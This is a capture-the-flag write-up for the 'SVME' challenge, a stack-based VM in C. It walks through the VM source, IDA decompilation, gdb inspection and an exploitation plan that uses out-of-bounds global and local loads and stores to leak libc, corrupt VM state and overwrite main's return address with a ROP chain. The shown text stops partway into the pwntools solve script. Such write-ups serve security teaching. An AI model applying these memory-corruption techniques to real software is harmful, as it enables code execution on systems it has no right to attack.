Post

SVME

SVME

Real World CTF 4th - SVME

Overview

  • Challenge Name : SVME
  • Author ; un1c0rn
  • Description : “Professor Terence Parr has taught us how to build a virtual machine. Now it’s time to break it!”
  • Date : 2022-01-23

The SVME binary challenge is a simple stack-based virtual machine written in C, based on Terence Parr’s reference implementation.

Here’s the source for the vm

The challenge files can be found here

The bug is an out-of-bounds read/write in the VM memory layout.

By abusing it, you can corrupt VM state and eventually get code execution.

Analysis

We are given 3 files (svme, libc, linker)

checksec

And the binary svme has all protections enabled.

First thing to do is patch it using pwninit.

1
pwninit --bin svme --libc libc-2.31.so --ld ld-2.31.so --no-template

With that, the binary should be linked with the one provided.

1
2
3
4
5
mark@rwx:~/Desktop/Practice/BinExp/Challs/STACK/Svme$ ldd svme_patched 
	linux-vdso.so.1 (0x00007ffff7fc3000)
	libc.so.6 => ./libc.so.6 (0x00007ffff7dc2000)
	ld-2.31.so => /lib64/ld-linux-x86-64.so.2 (0x00007ffff7fc5000)
mark@rwx:~/Desktop/Practice/BinExp/Challs/STACK/Svme

The attached slide is a presentation on “How to Build a Virtual Machine”.

intro

The goal is to simulate a simple computer using bytecodes. An instruction set is defined including operations like add, subtract, branch, load, store, print. The bytecode format and a sample program are shown in the slide. The VM will fetch, decode and execute instructions in a cycle, operating on a stack.

You can always take your time to understand how it works, but it’s just a simple stack based virtual machine.

Take a a quick look at the VM’s ISA.

instruction set
Instruction Set
instruction format
Instruction Format

Also, the VM’s repository was never provided, but with some easy OSINT-fu we can find it.

osint osint osint osint

Go ahead and clone the repo!

clone

Since we have the source code of the virtual machine, I started with that first to understand how it works.

Here’s the header file included in vm.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#ifndef VM_H_
#define VM_H_

#ifdef __cplusplus
extern "C" {
#endif

#define DEFAULT_STACK_SIZE      1000
#define DEFAULT_CALL_STACK_SIZE 100
#define DEFAULT_NUM_LOCALS      10

typedef enum {
    NOOP    = 0,
    IADD    = 1,   // int add
    ISUB    = 2,
    IMUL    = 3,
    ILT     = 4,   // int less than
    IEQ     = 5,   // int equal
    BR      = 6,   // branch
    BRT     = 7,   // branch if true
    BRF     = 8,   // branch if true
    ICONST  = 9,   // push constant integer
    LOAD    = 10,  // load from local context
    GLOAD   = 11,  // load from global memory
    STORE   = 12,  // store in local context
    GSTORE  = 13,  // store in global memory
    PRINT   = 14,  // print stack top
    POP     = 15,  // throw away top of stack
    CALL    = 16,  // call function at address with nargs,nlocals
    RET     = 17,  // return value from function
    HALT    = 18
} VM_CODE;

typedef struct {
    int returnip;
    int locals[DEFAULT_NUM_LOCALS];
} Context;

typedef struct {
    int *code;
    int code_size;

    // global variable space
    int *globals;
    int nglobals;

    // Operand stack, grows upwards
    int stack[DEFAULT_STACK_SIZE];
    Context call_stack[DEFAULT_CALL_STACK_SIZE];
} VM;

VM *vm_create(int *code, int code_size, int nglobals);
void vm_free(VM *vm);
void vm_init(VM *vm, int *code, int code_size, int nglobals);
void vm_exec(VM *vm, int startip, bool trace);
void vm_print_instr(int *code, int ip);
void vm_print_stack(int *stack, int count);
void vm_print_data(int *globals, int count);

#ifdef __cplusplus
}
#endif

#endif

The VM supports 18 instructions covering arithmetic, memory access, control flow, and function handling:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
typedef enum {
    NOOP    = 0,
    IADD    = 1,   // int add
    ISUB    = 2,
    IMUL    = 3,
    ILT     = 4,   // int less than
    IEQ     = 5,   // int equal
    BR      = 6,   // branch
    BRT     = 7,   // branch if true
    BRF     = 8,   // branch if true
    ICONST  = 9,   // push constant integer
    LOAD    = 10,  // load from local context
    GLOAD   = 11,  // load from global memory
    STORE   = 12,  // store in local context
    GSTORE  = 13,  // store in global memory
    PRINT   = 14,  // print stack top
    POP     = 15,  // throw away top of stack
    CALL    = 16,  // call function at address with nargs,nlocals
    RET     = 17,  // return value from function
    HALT    = 18
} VM_CODE;

When the VM is initialized, its context holds everything needed to run bytecode: a pointer to the instructions to execute, its size, a global memory region, a fixed-size operand stack, and a call stack for function frames.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#define DEFAULT_STACK_SIZE      1000
#define DEFAULT_CALL_STACK_SIZE 100
#define DEFAULT_NUM_LOCALS      10

typedef struct {
    int returnip;
    int locals[DEFAULT_NUM_LOCALS];
} Context;

typedef struct {
    int *code;
    int code_size;

    // global variable space
    int *globals;
    int nglobals;

    // Operand stack, grows upwards
    int stack[DEFAULT_STACK_SIZE];
    Context call_stack[DEFAULT_CALL_STACK_SIZE];
} VM;

As the slide mentions, the VM is 32-bit word-addressable, meaning everything in memory (code, data, and stack values) is handled as a 4-byte integer.

We also have the function prototypes:

1
2
3
4
5
6
7
VM *vm_create(int *code, int code_size, int nglobals);
void vm_free(VM *vm);
void vm_init(VM *vm, int *code, int code_size, int nglobals);
void vm_exec(VM *vm, int startip, bool trace);
void vm_print_instr(int *code, int ip);
void vm_print_stack(int *stack, int count);
void vm_print_data(int *globals, int count);

With that in place, we can look at the VM functions.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
void vm_init(VM *vm, int *code, int code_size, int nglobals)
{
    vm->code = code;
    vm->code_size = code_size;
    vm->globals = calloc(nglobals, sizeof(int));
    vm->nglobals = nglobals;
}

void vm_free(VM *vm)
{
    free(vm->globals);
    free(vm);
}

VM *vm_create(int *code, int code_size, int nglobals)
{
    VM *vm = calloc(1, sizeof(VM));
    vm_init(vm, code, code_size, nglobals);
    return vm;
}

When a VM instance is created, it allocates a zero-initialized VM structure and sets up its execution context:

  • bytecode pointer
  • code size
  • a heap-allocated global variable array

One notable detail is that vm->globals is allocated using calloc, even when nglobals is 0. In that case, the allocation size becomes zero, but that would still return a non-null pointer.

When vm_free is called, it deallocates the memory used by the VM.

Our main interest is of course the dispatcher (vm_exec), since that’s where every instruction gets decoded and executed.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
void vm_exec(VM *vm, int startip, bool trace)
{
    // registers
    int ip;         // instruction pointer register
    int sp;         // stack pointer register
    int callsp;     // call stack pointer register

    int a = 0;
    int b = 0;
    int addr = 0;
    int offset = 0;

    ip = startip;
    sp = -1;
    callsp = -1;
    int opcode = vm->code[ip];

    while (opcode != HALT && ip < vm->code_size) {
        if (trace) vm_print_instr(vm->code, ip);
        ip++; //jump to next instruction or to operand
        switch (opcode) {
            case IADD:
                b = vm->stack[sp--];           // 2nd opnd at top of stack
                a = vm->stack[sp--];           // 1st opnd 1 below top
                vm->stack[++sp] = a + b;       // push result
                break;
            case ISUB:
                b = vm->stack[sp--];
                a = vm->stack[sp--];
                vm->stack[++sp] = a - b;
                break;
            case IMUL:
                b = vm->stack[sp--];
                a = vm->stack[sp--];
                vm->stack[++sp] = a * b;
                break;
            case ILT:
                b = vm->stack[sp--];
                a = vm->stack[sp--];
                vm->stack[++sp] = (a < b) ? true : false;
                break;
            case IEQ:
                b = vm->stack[sp--];
                a = vm->stack[sp--];
                vm->stack[++sp] = (a == b) ? true : false;
                break;
            case BR:
                ip = vm->code[ip];
                break;
            case BRT:
                addr = vm->code[ip++];
                if (vm->stack[sp--] == true) ip = addr;
                break;
            case BRF:
                addr = vm->code[ip++];
                if (vm->stack[sp--] == false) ip = addr;
                break;
            case ICONST:
                vm->stack[++sp] = vm->code[ip++];  // push operand
                break;
            case LOAD: // load local or arg
                offset = vm->code[ip++];
                vm->stack[++sp] = vm->call_stack[callsp].locals[offset];
                break;
            case GLOAD: // load from global memory
                addr = vm->code[ip++];
                vm->stack[++sp] = vm->globals[addr];
                break;
            case STORE:
                offset = vm->code[ip++];
                vm->call_stack[callsp].locals[offset] = vm->stack[sp--];
                break;
            case GSTORE:
                addr = vm->code[ip++];
                vm->globals[addr] = vm->stack[sp--];
                break;
            case PRINT:
                printf("%d\n", vm->stack[sp--]);
                break;
            case POP:
                --sp;
                break;
            case CALL:
                // expects all args on stack
                addr = vm->code[ip++];			// index of target function
                int nargs = vm->code[ip++]; 	// how many args got pushed
                int nlocals = vm->code[ip++]; 	// how many locals to allocate
                ++callsp; // bump stack pointer to reveal space for this call
                vm_context_init(&vm->call_stack[callsp], ip, nargs+nlocals);
                // copy args into new context
                for (int i=0; i<nargs; i++) {
                    vm->call_stack[callsp].locals[i] = vm->stack[sp-i];
                }
                sp -= nargs;
                ip = addr;		// jump to function
                break;
            case RET:
                ip = vm->call_stack[callsp].returnip;
                callsp--; // pop context
                break;
            default:
                printf("invalid opcode: %d at ip=%d\n", opcode, (ip - 1));
                exit(1);
        }
        if (trace) vm_print_stack(vm->stack, sp);
        opcode = vm->code[ip];
    }
    if (trace) vm_print_data(vm->globals, vm->nglobals);
}

The logic is pretty straightforward:

  • it fetches the next instruction to execute
  • checks that it hasn’t reached HALT
  • ensures the instruction pointer is still within code_size
  • then dispatches execution to the corresponding handler

Suppose we want to compute the addition of two numbers (0x1336 + 0x1).

Here’s how we can achieve it using the VM instruction set.

1
2
3
ICONST 0x1336
ICONST 0x1
IADD

This is how the flow is going to be:

stack 1
Stack is initialized (sp = -1)
stack 2
We pushed 0x1336 to the stack (sp = 0)
stack 3
We pushed 0x1 to the stack (sp = 1)
stack 4
We pop from the tos (top of stack) and place the value in variale b (b = 0x1, sp = 0)
stack 5
We pop from the tos and place the value in variale a (a = 0x1336, sp = -1)
stack 6
The sum of a and b is computed and pushed to the stack (sum = 0x1337, sp = 0)

That’s why it’s called a stack-based VM. All operations are done through a stack, pushing operands on it and popping results off it instead of working directly on registers. And YES I know my drawing is horrible 😭

After reading the various handlers the vulnerability becomes obvious:

vuln

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
case ICONST:
    vm->stack[++sp] = vm->code[ip++];  // push operand
    break;
case LOAD: // load local or arg
    offset = vm->code[ip++];
    vm->stack[++sp] = vm->call_stack[callsp].locals[offset];
    break;
case GLOAD: // load from global memory
    addr = vm->code[ip++];
    vm->stack[++sp] = vm->globals[addr];
    break;
case STORE:
    offset = vm->code[ip++];
    vm->call_stack[callsp].locals[offset] = vm->stack[sp--];
    break;
case GSTORE:
    addr = vm->code[ip++];
    vm->globals[addr] = vm->stack[sp--];
    break;

The usual suspect for VM like challenges are OOB, and here we see an OOB read/write bug in LOAD, GLOAD, STORE, GSTORE.

This is already enough to pwn the vm since the vulnerability gives us arbitrary read/write.

But to actually pwn it we need to know how the challenge (svme) operates the VM.

Loading the binary up in IDA here’s the main function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
int __fastcall main(int argc, const char **argv, const char **envp)
{
  signed int i; // [rsp+10h] [rbp-220h]
  int v5; // [rsp+14h] [rbp-21Ch]
  VM *vm; // [rsp+18h] [rbp-218h]
  int code[130]; // [rsp+20h] [rbp-210h] BYREF
  unsigned __int64 v8; // [rsp+228h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  for ( i = 0; (unsigned int)i <= 0x1FF; i += v5 )
  {
    v5 = read(0, &code[i], 512LL - i);
    if ( v5 <= 0 )
      break;
  }
  vm = vm_create(code, i / 4, 0);
  vm_exec(vm, 0, 1);
  vm_free(vm);
  return 0;
}

A cool trick we can use is to load the header file into IDA, because the binary wasn’t compiled with debug info although not stripped. That way IDA can reconstruct the data types used by the VM.

For example, here’s the decompilation of vm_exec without structure definitions:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
__int64 __fastcall vm_exec(__int64 a1, int a2, char a3)
{
  __int64 v3; // rdx
  __int64 result; // rax
  int v5; // eax
  int v6; // eax
  int v7; // eax
  int v8; // eax
  int v9; // eax
  int v10; // eax
  int v11; // eax
  int v12; // eax
  int v13; // eax
  int v14; // eax
  int v15; // eax
  int v16; // eax
  __int64 v17; // rdx
  int v19; // [rsp+14h] [rbp-2Ch]
  int v20; // [rsp+18h] [rbp-28h]
  int v21; // [rsp+1Ch] [rbp-24h]
  int i; // [rsp+20h] [rbp-20h]
  int j; // [rsp+24h] [rbp-1Ch]
  int v24; // [rsp+28h] [rbp-18h]
  int v25; // [rsp+28h] [rbp-18h]
  int v26; // [rsp+28h] [rbp-18h]
  int v27; // [rsp+28h] [rbp-18h]
  int v28; // [rsp+28h] [rbp-18h]
  int v29; // [rsp+2Ch] [rbp-14h]
  int v30; // [rsp+2Ch] [rbp-14h]
  int v31; // [rsp+2Ch] [rbp-14h]
  int v32; // [rsp+2Ch] [rbp-14h]
  int v33; // [rsp+2Ch] [rbp-14h]
  int v34; // [rsp+30h] [rbp-10h]
  int v35; // [rsp+30h] [rbp-10h]
  int v36; // [rsp+30h] [rbp-10h]
  int v37; // [rsp+30h] [rbp-10h]
  int v38; // [rsp+34h] [rbp-Ch]
  int v39; // [rsp+38h] [rbp-8h]

  v19 = a2;
  v20 = -1;
  v21 = -1;
  v3 = 4LL * a2;
  result = *(unsigned int *)(v3 + *(_QWORD *)a1);
  for ( i = *(_DWORD *)(v3 + *(_QWORD *)a1); i != 18; i = *(_DWORD *)(v17 + *(_QWORD *)a1) )
  {
    result = *(unsigned int *)(a1 + 8);
    if ( v19 >= (int)result )
      break;
    if ( a3 )
      vm_print_instr(*(_QWORD *)a1, (unsigned int)v19);
    ++v19;
    switch ( i )
    {
      case 1:
        v29 = *(_DWORD *)(a1 + 4 * (v20 + 4LL) + 12);
        v24 = *(_DWORD *)(a1 + 4 * (v20 - 1 + 4LL) + 12);
        v20 = v20 - 2 + 1;
        *(_DWORD *)(a1 + 4 * (v20 + 4LL) + 12) = v24 + v29;
        break;
      case 2:
        v30 = *(_DWORD *)(a1 + 4 * (v20 + 4LL) + 12);
        v25 = *(_DWORD *)(a1 + 4 * (v20 - 1 + 4LL) + 12);
        v20 = v20 - 2 + 1;
        *(_DWORD *)(a1 + 4 * (v20 + 4LL) + 12) = v25 - v30;
        break;
      case 3:
        v31 = *(_DWORD *)(a1 + 4 * (v20 + 4LL) + 12);
        v26 = *(_DWORD *)(a1 + 4 * (v20 - 1 + 4LL) + 12);
        v20 = v20 - 2 + 1;
        *(_DWORD *)(a1 + 4 * (v20 + 4LL) + 12) = v31 * v26;
        break;
      case 4:
        v32 = *(_DWORD *)(a1 + 4 * (v20 + 4LL) + 12);
        v27 = *(_DWORD *)(a1 + 4 * (v20 - 1 + 4LL) + 12);
        v20 = v20 - 2 + 1;
        *(_DWORD *)(a1 + 4 * (v20 + 4LL) + 12) = v27 < v32;
        break;
      case 5:
        v33 = *(_DWORD *)(a1 + 4 * (v20 + 4LL) + 12);
        v28 = *(_DWORD *)(a1 + 4 * (v20 - 1 + 4LL) + 12);
        v20 = v20 - 2 + 1;
        *(_DWORD *)(a1 + 4 * (v20 + 4LL) + 12) = v28 == v33;
        break;
      case 6:
        v19 = *(_DWORD *)(4LL * v19 + *(_QWORD *)a1);
        break;
      case 7:
        v5 = v19++;
        v34 = *(_DWORD *)(*(_QWORD *)a1 + 4LL * v5);
        v6 = v20--;
        if ( *(_DWORD *)(a1 + 4 * (v6 + 4LL) + 12) == 1 )
          v19 = v34;
        break;
      case 8:
        v7 = v19++;
        v35 = *(_DWORD *)(*(_QWORD *)a1 + 4LL * v7);
        v8 = v20--;
        if ( !*(_DWORD *)(a1 + 4 * (v8 + 4LL) + 12) )
          v19 = v35;
        break;
      case 9:
        v9 = v19++;
        *(_DWORD *)(a1 + 4 * (++v20 + 4LL) + 12) = *(_DWORD *)(*(_QWORD *)a1 + 4LL * v9);
        break;
      case 10:
        v10 = v19++;
        *(_DWORD *)(a1 + 4 * (++v20 + 4LL) + 12) = *(_DWORD *)(a1
                                                             + 4
                                                             * (*(int *)(*(_QWORD *)a1 + 4LL * v10) + 11LL * v21 + 1004)
                                                             + 16);
        break;
      case 11:
        v11 = v19++;
        *(_DWORD *)(a1 + 4 * (++v20 + 4LL) + 12) = *(_DWORD *)(4LL * *(int *)(*(_QWORD *)a1 + 4LL * v11)
                                                             + *(_QWORD *)(a1 + 16));
        break;
      case 12:
        v12 = v19++;
        v38 = *(_DWORD *)(*(_QWORD *)a1 + 4LL * v12);
        v13 = v20--;
        *(_DWORD *)(a1 + 4 * (v38 + 11LL * v21 + 1004) + 16) = *(_DWORD *)(a1 + 4 * (v13 + 4LL) + 12);
        break;
      case 13:
        v14 = v19++;
        v36 = *(_DWORD *)(*(_QWORD *)a1 + 4LL * v14);
        v15 = v20--;
        *(_DWORD *)(*(_QWORD *)(a1 + 16) + 4LL * v36) = *(_DWORD *)(a1 + 4 * (v15 + 4LL) + 12);
        break;
      case 14:
        v16 = v20--;
        printf("%d\n", *(_DWORD *)(a1 + 4 * (v16 + 4LL) + 12));
        break;
      case 15:
        --v20;
        break;
      case 16:
        v37 = *(_DWORD *)(*(_QWORD *)a1 + 4LL * v19);
        v39 = *(_DWORD *)(*(_QWORD *)a1 + 4LL * (v19 + 1));
        vm_context_init(
          44LL * ++v21 + 4016 + a1 + 12,
          (unsigned int)(v19 + 3),
          (unsigned int)(v39 + *(_DWORD *)(*(_QWORD *)a1 + 4LL * (v19 + 2))));
        for ( j = 0; j < v39; ++j )
          *(_DWORD *)(a1 + 4 * (j + 11LL * v21 + 1004) + 16) = *(_DWORD *)(a1 + 4 * (v20 - j + 4LL) + 12);
        v20 -= v39;
        v19 = v37;
        break;
      case 17:
        v19 = *(_DWORD *)(a1 + 44LL * v21-- + 4028);
        break;
      default:
        printf("invalid opcode: %d at ip=%d\n", i, v19 - 1);
        exit(1);
    }
    if ( a3 )
      vm_print_stack(a1 + 28, (unsigned int)v20);
    v17 = 4LL * v19;
    result = *(unsigned int *)(v17 + *(_QWORD *)a1);
  }
  if ( a3 )
    return vm_print_data(*(_QWORD *)(a1 + 16), *(unsigned int *)(a1 + 24));
  return result;
}

The decompilation itself isn’t so hard to read through and creating the data type is also easy as it’s not a complex data structure.

But who loves doing pointer arithmetic in their head? (sm0g does!)..

Anyways to load the header file go to:

1
File -> Load File -> Parse C header file

Here’s how it looks like after doing that:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
void vm_exec(VM *vm, int startip, bool trace)
{
  int v3; // eax
  int v4; // eax
  int v5; // eax
  int v6; // eax
  int v7; // eax
  int v8; // eax
  int v9; // eax
  int v10; // eax
  int v11; // eax
  int v12; // eax
  int v13; // eax
  int v14; // eax
  int returnip; // [rsp+14h] [rbp-2Ch]
  int count; // [rsp+18h] [rbp-28h]
  int v18; // [rsp+1Ch] [rbp-24h]
  int i; // [rsp+20h] [rbp-20h]
  int j; // [rsp+24h] [rbp-1Ch]
  int v21; // [rsp+28h] [rbp-18h]
  int v22; // [rsp+28h] [rbp-18h]
  int v23; // [rsp+28h] [rbp-18h]
  int v24; // [rsp+28h] [rbp-18h]
  int v25; // [rsp+28h] [rbp-18h]
  int v26; // [rsp+2Ch] [rbp-14h]
  int v27; // [rsp+2Ch] [rbp-14h]
  int v28; // [rsp+2Ch] [rbp-14h]
  int v29; // [rsp+2Ch] [rbp-14h]
  int v30; // [rsp+2Ch] [rbp-14h]
  int v31; // [rsp+30h] [rbp-10h]
  int v32; // [rsp+30h] [rbp-10h]
  int v33; // [rsp+30h] [rbp-10h]
  int v34; // [rsp+30h] [rbp-10h]
  int v35; // [rsp+34h] [rbp-Ch]
  int v36; // [rsp+38h] [rbp-8h]

  returnip = startip;
  count = -1;
  v18 = -1;
  for ( i = vm->code[startip]; i != 18 && returnip < vm->code_size; i = vm->code[returnip] )
  {
    if ( trace )
      vm_print_instr(vm->code, returnip);
    ++returnip;
    switch ( i )
    {
      case 1:
        v26 = vm->stack[count];
        v21 = *(&vm->nglobals + count);
        count = count - 2 + 1;
        vm->stack[count] = v21 + v26;
        break;
      case 2:
        v27 = vm->stack[count];
        v22 = *(&vm->nglobals + count);
        count = count - 2 + 1;
        vm->stack[count] = v22 - v27;
        break;
      case 3:
        v28 = vm->stack[count];
        v23 = *(&vm->nglobals + count);
        count = count - 2 + 1;
        vm->stack[count] = v28 * v23;
        break;
      case 4:
        v29 = vm->stack[count];
        v24 = *(&vm->nglobals + count);
        count = count - 2 + 1;
        vm->stack[count] = v24 < v29;
        break;
      case 5:
        v30 = vm->stack[count];
        v25 = *(&vm->nglobals + count);
        count = count - 2 + 1;
        vm->stack[count] = v25 == v30;
        break;
      case 6:
        returnip = vm->code[returnip];
        break;
      case 7:
        v3 = returnip++;
        v31 = vm->code[v3];
        v4 = count--;
        if ( vm->stack[v4] == 1 )
          returnip = v31;
        break;
      case 8:
        v5 = returnip++;
        v32 = vm->code[v5];
        v6 = count--;
        if ( !vm->stack[v6] )
          returnip = v32;
        break;
      case 9:
        v7 = returnip++;
        vm->stack[++count] = vm->code[v7];
        break;
      case 10:
        v8 = returnip++;
        vm->stack[++count] = vm->call_stack[v18].locals[vm->code[v8]];
        break;
      case 11:
        v9 = returnip++;
        vm->stack[++count] = vm->globals[vm->code[v9]];
        break;
      case 12:
        v10 = returnip++;
        v35 = vm->code[v10];
        v11 = count--;
        vm->call_stack[v18].locals[v35] = vm->stack[v11];
        break;
      case 13:
        v12 = returnip++;
        v33 = vm->code[v12];
        v13 = count--;
        vm->globals[v33] = vm->stack[v13];
        break;
      case 14:
        v14 = count--;
        printf("%d\n", vm->stack[v14]);
        break;
      case 15:
        --count;
        break;
      case 16:
        v34 = vm->code[returnip];
        v36 = vm->code[returnip + 1];
        vm_context_init(&vm->call_stack[++v18], (returnip + 3), (v36 + vm->code[returnip + 2]));
        for ( j = 0; j < v36; ++j )
          vm->call_stack[v18].locals[j] = vm->stack[count - j];
        count -= v36;
        returnip = v34;
        break;
      case 17:
        returnip = vm->call_stack[v18--].returnip;
        break;
      default:
        printf("invalid opcode: %d at ip=%d\n", i, returnip - 1);
        exit(1);
    }
    if ( trace )
      vm_print_stack(vm->stack, count);
  }
  if ( trace )
    vm_print_data(vm->globals, vm->nglobals);
}

It looks pretty much the same as the vm implementation, but what we’re interested in is how the vm is initialized:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
int __fastcall main(int argc, const char **argv, const char **envp)
{
  signed int i; // [rsp+10h] [rbp-220h]
  int v5; // [rsp+14h] [rbp-21Ch]
  VM *vm; // [rsp+18h] [rbp-218h]
  int code[130]; // [rsp+20h] [rbp-210h] BYREF
  unsigned __int64 v8; // [rsp+228h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  for ( i = 0; i <= 0x1FF; i += v5 )
  {
    v5 = read(0, &code[i], 512LL - i);
    if ( v5 <= 0 )
      break;
  }
  vm = vm_create(code, i / 4, 0);
  vm_exec(vm, 0, 1);
  vm_free(vm);
  return 0;
}

VM *vm_create(int *code, int code_size, int nglobals)
{
  VM *vm; // [rsp+18h] [rbp-8h]

  vm = calloc(1uLL, 0x20F0uLL);
  vm_init(vm, code, code_size, nglobals);
  return vm;
}

void vm_init(VM *vm, int *code, int code_size, int nglobals)
{
  vm->code = code;
  vm->code_size = code_size;
  vm->globals = calloc(nglobals, 4uLL);
  vm->nglobals = nglobals;
}

The thing here is that:

  • It reads up to 0x1FF bytes into code
  • Creates a vm context based on our code
  • So our code is directly executed by the vm

vm->code is a stack pointer of the bytecode in the main function stack frame.

Let’s have a look at the structure in gdb.

Again, the binary wasn’t compiled with debug_info. But because we have the source we can compile an object file with symbols:

gcc

In gdb, we can load the symbol file

gdb

1
2
3
4
5
6
7
8
9
10
11
12
mark@rwx:~/Desktop/Practice/BinExp/Challs/STACK/Svme$ gdb -q svme_patched
Loading GEF...
GEF is ready, type 'gef' to start, 'gef config' to configure
Loaded 399 commands (+111 aliases) for GDB 15.1 using Python engine 3.12
[+] Could not find /home/mark/.gef.rc, GEF uses default settings
Reading symbols from svme_patched...
(No debugging symbols found in svme_patched)
gef> add-symbol-file vm.o 0x0
add symbol table from file "vm.o" at
	.text_addr = 0x0
Reading symbols from vm.o...
gef> b *main+221

We can start the process with run and send 0x1ff bytes. The breakpoint set at *main+221 should hit.

gdb2 gdb3

Register $rdi holds a pointer to the VM structure, we can dump it:

gdb4

Exploitation

Our goal is to leverage the arbitrary read/write via the OOB to gain code execution.

There are many ways you can go about that but before we do so, we need a way to get leaks.

If you think about it you’ll realize there’s actually no way of getting leak to stdout and making use of that in a second stage.

So we need to do everything inplace.

How do we get leak?

For getting a libc leak, there’s a pointer to the stack already on the vm context, we can make use of the GLOAD to save that address to the vm stack.

1
2
3
4
case GLOAD: // load from global memory
    addr = vm->code[ip++];
    vm->stack[++sp] = vm->globals[addr];
    break;

The main function returns to __libc_start_main+0xf3 so it holds a pointer to a libc region on the stack.

We can then compute the offset to that address (the return address) using any of the arithmetic operation (although I simply used ADD).

A way to do this is:

  • read the lower 4 bytes at [sp+n]
  • write the offset to what we want at [sp+n+4]
  • compute the sum which is then stored at [sp+n]
  • read the upper 4 bytes at [sp+n+4]
1
2
3
4
5
case IADD:
    b = vm->stack[sp--];           // 2nd opnd at top of stack
    a = vm->stack[sp--];           // 1st opnd 1 below top
    vm->stack[++sp] = a + b;       // push result
    break;

And then make use of GSTORE to write that address to vm->globals effectively corrupting vm->globals.

1
2
3
4
case GSTORE:
    addr = vm->code[ip++];
    vm->globals[addr] = vm->stack[sp--];
    break;

Then when we do GLOAD, it reads a libc address (__libc_start_main+0xf3) to the vm stack.

1
2
3
4
case GLOAD: // load from global memory
    addr = vm->code[ip++];
    vm->stack[++sp] = vm->globals[addr];
    break;

With that we can easily compute offsets to gadgets.

For getting code execution I decided to overwrite the return address with ROPchain and that’s easier to achieve because we already have the main function return address stored in vm->globals.

I made use of STORE to perform the write.

1
2
3
4
case STORE:
    offset = vm->code[ip++];
    vm->call_stack[callsp].locals[offset] = vm->stack[sp--];
    break;

The reason for using STORE is because I had the ropchain placed on the vm stack already, and i’d like to store it at a controller pointer which is vm->globals

So we look for instruction that reads from vm->stack and stores it at vm->globals (GSTORE & STORE) matches this request:

1
2
3
4
5
6
7
8
case STORE:
    offset = vm->code[ip++];
    vm->call_stack[callsp].locals[offset] = vm->stack[sp--];
    break;
case GSTORE:
    addr = vm->code[ip++];
    vm->globals[addr] = vm->stack[sp--];
    break;

GSTORE is more easier to use, but because I wanted to show some gdb-fu I’ll use STORE

This is how to calculate the offset between where we are normally supposed to write to and our target.

First you need to know that callsp is currently at -1 because we’ve not executed any CALL instruction which ends up creating a new stack frame.

win0 win1 win2 win3 win4

Hence, the offset is 0xf84, which corresponds to 0x3e1 in word-addressable units (divide by 4 since each word is 4 bytes).

It’s a pretty easy challenge once you realize that you can simply use one of the vm’s field to perform your writes.

A thing to note is that vm_free is later called and because vm->globals contains an invalid heap chunk it would crash. To avoid that error I simply overwrote it to NULL

free

From the glibc source, when you call free(0) is simply returns.

Here’s the file solve script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

exe = context.binary = ELF('svme_patched')
libc = exe.libc

context.terminal = ['gnome-terminal', '--maximize', '-e']
context.log_level = 'info'

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: 
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

gdbscript = '''
brva 0x19BE
add-symbol-file vm.o 0x0
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

IADD_OP   = 0x1
ISUB_OP   = 0x2
IMUL_OP   = 0x3
ILT_OP    = 0x4
IEQ_OP    = 0x5
